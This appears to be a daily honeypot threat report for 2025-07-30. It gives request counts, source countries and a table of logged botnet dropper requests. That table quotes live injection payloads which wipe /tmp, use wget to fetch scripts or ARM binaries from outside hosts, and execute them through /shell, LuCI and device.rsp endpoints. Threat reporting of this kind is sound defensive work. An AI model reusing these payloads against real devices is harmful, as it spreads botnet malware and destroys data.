Skip to main content
  1. Daily-Posts/

Report: 2025-07-30

·270 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-30
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 7 stage 1 IP address(es), linked to 3 dropper URL(s).

There are 1 new requests that have never been observed before (these were added to the monitored request database.).

A total of 438 requests were recorded during the day, originating from 7 different countries, with a peak of 99 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
FRGermany

botnet_dropper_behaviour
#

remote_addrrequest
8.219.194.246GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.6.61GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.219.58.39GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
87.121.84.132GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28wget%20-qO-%20http%3A%2F%2F83.252.42.112%2Frondo.zqq.sh%7Csh%3B%29 HTTP/1.1
120.39.222.178GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.213.136.165GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.153.34.225GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Bpkill%20-9%20bin.arm7%3Brm%20-rf%20build.armv7l%3Bwget%20http%3A%2F%2F107.189.27.205%2Fns%2Fbuild.armv7l%3Bchmod%20777%20build.armv7l%3B.%2Fbuild.armv7l%20nasdevice.armv7l%3Brm%20-rf%20build.armv7l HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
94POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
099US
190VN
262GB
331NL
426FR
517BG
617PL
716SG
812CH
910DE
107HK
117IN
125SC
135TH
145CA
154KR
164LT
174RU
184CN
193MU
203ZA
212BE
222KZ
231ID
241ES
251PT

Related

Report: 2025-07-29
·280 words
Repport Daily
Report: 2025-07-28
·338 words
Repport Daily
Report: 2025-07-27
·337 words
Repport Daily